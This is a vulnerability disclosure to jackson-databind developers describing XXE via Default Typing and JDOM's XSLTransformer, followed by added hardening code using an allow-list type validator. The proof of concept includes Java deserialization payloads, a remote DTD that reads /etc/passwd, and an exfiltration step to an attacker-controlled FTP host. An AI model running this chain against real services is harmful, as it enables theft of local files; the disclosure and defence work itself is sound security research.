cve-2341-jdom2.txt
Hi Developers:
I found that jackson-databind is vulnerable to XXE when Default Typing is enabled and the service has jdom.jar in the classpath. An attacker is able to read arbitrary local files with an XXE payload.
Details are as follows:
Description
org.jdom2.transform.XSLTransformer#XSLTransformer(java.lang.String) accepts a stylesheet system id as a string parameter, which may be the URL of an XML file.
When an org.jdom2.transform.XSLTransformer object is constructed, that XML file is parsed with the external-parameter-entities and external-general-entities features enabled by default, and this is where the XXE attack occurs.
PoC
This is a typical XXE exploit; for background on the technique see https://blog.zsec.uk/out-of-band-xxe-2/
1. Start a malicious FTP server to receive the exfiltrated contents. The code is available here: https://gist.github.com/staaldraad/280f167f5cb49a80b4a3
> python xxeftp.py
2. Deserialize an org.jdom2.transform.XSLTransformer object from JSON:
import java.io.IOException;
import com.fasterxml.jackson.databind.ObjectMapper;

public class Poc {
    public static void main(String[] args) {
        // for jdom 2.X
        String payload1 = "[\"org.jdom2.transform.XSLTransformer\",\"http://aliyun.nudtcat.org:84/ftp5.xml\"]";
        // for jdom 1.X
        String payload2 = "[\"org.jdom.transform.XSLTransformer\",\"http://aliyun.nudtcat.org:84/ftp5.xml\"]";
        ObjectMapper mapper = new ObjectMapper();
        // Default Typing lets the JSON name any class on the classpath as the value type
        mapper.enableDefaultTyping();
        try {
            // Constructing the XSLTransformer fetches and parses the stylesheet URL
            mapper.readValue(payload1, Object.class);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
The contents of http://aliyun.nudtcat.org:84/ftp5.xml are as follows:
<?xml version="1.0"?>
<!DOCTYPE cdl [<!ENTITY % asd SYSTEM "http://aliyun.nudtcat.org:84/dtd.php">%asd;%c;]>
<cdl>&rrr;</cdl>
The contents of http://aliyun.nudtcat.org:84/dtd.php are as follows:
<?php
echo '<!ENTITY % d SYSTEM "file:///etc/passwd"> <!ENTITY % c "<!ENTITY rrr SYSTEM \'ftp://aliyun.nudtcat.org:2121/%d;\'>">';
The complete code is attached.
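As an added example (not the reporter's code, and not jackson-databind's or JDOM's own), the following Java puts the ObjectMapper configuration the PoC relies on next to a hardened one that restricts Default Typing to an allow-list of trusted subtypes, so a payload naming org.jdom2.transform.XSLTransformer is rejected while the type id is being resolved, before any constructor runs and before the stylesheet URL is touched. It assumes jackson-databind 2.10 or later (which introduced PolymorphicTypeValidator), a hypothetical trusted package prefix com.example.app., and constructed sample payloads with a placeholder URL in place of the one in the report.

```java
// Added example, not part of the original report. Assumes jackson-databind >= 2.10.
import java.io.IOException;
import java.util.Arrays;
import java.util.List;

import com.fasterxml.jackson.databind.JsonMappingException;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

public class DefaultTypingHardening {

    // Hypothetical application package: only types under this prefix may appear in
    // the type-id slot of a polymorphic value. org.jdom2.* and org.jdom.* never match,
    // so they are denied whether or not jdom.jar is on the classpath.
    private static final String TRUSTED_PREFIX = "com.example.app.";

    /** The configuration the report exploits: any class on the classpath can be named. */
    static ObjectMapper unsafeMapper() {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping(); // deprecated since 2.10 for exactly this reason
        return mapper;
    }

    /** Same applicability as enableDefaultTyping(), but subtypes must pass the allow-list. */
    static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                .allowIfSubType(TRUSTED_PREFIX)
                .build();
        ObjectMapper mapper = new ObjectMapper();
        mapper.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.OBJECT_AND_NON_CONCRETE);
        return mapper;
    }

    /**
     * True when the mapper refuses the polymorphic payload. A validator denial, or an
     * unresolvable type id, surfaces as a JsonMappingException subclass
     * (InvalidTypeIdException), raised before the named class is instantiated.
     */
    static boolean rejectsTypeId(ObjectMapper mapper, String json) {
        try {
            mapper.readValue(json, Object.class);
            return false; // the class was resolved and constructed
        } catch (JsonMappingException e) {
            return true;
        } catch (IOException e) {
            return false; // malformed JSON, not a type-id decision
        }
    }

    public static void main(String[] args) {
        // Constructed samples: same shape as the PoC payloads, placeholder URL.
        List<String> samples = Arrays.asList(
            "[\"org.jdom2.transform.XSLTransformer\",\"http://ATTACKER-PLACEHOLDER/stylesheet.xml\"]",
            "[\"org.jdom.transform.XSLTransformer\",\"http://ATTACKER-PLACEHOLDER/stylesheet.xml\"]");
        ObjectMapper hardened = hardenedMapper();
        for (String json : samples) {
            System.out.println(json + " -> rejected by hardened mapper: "
                    + rejectsTypeId(hardened, json));
        }
    }
}
```

The point of the allow-list is that the decision is made on the type-id string and the resolved class, not on what the class's constructor does, so it closes this gadget and every other one that depends on Default Typing at once; a deny-list of known gadget classes only catches the ones already reported. Where the application does not actually need polymorphic deserialization of untrusted input, not activating Default Typing at all is the simplest fix.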
Vulnerability Reporter
何彪 (He Biao) from the Non-Attack Security Lab of Ant Financial Services Group.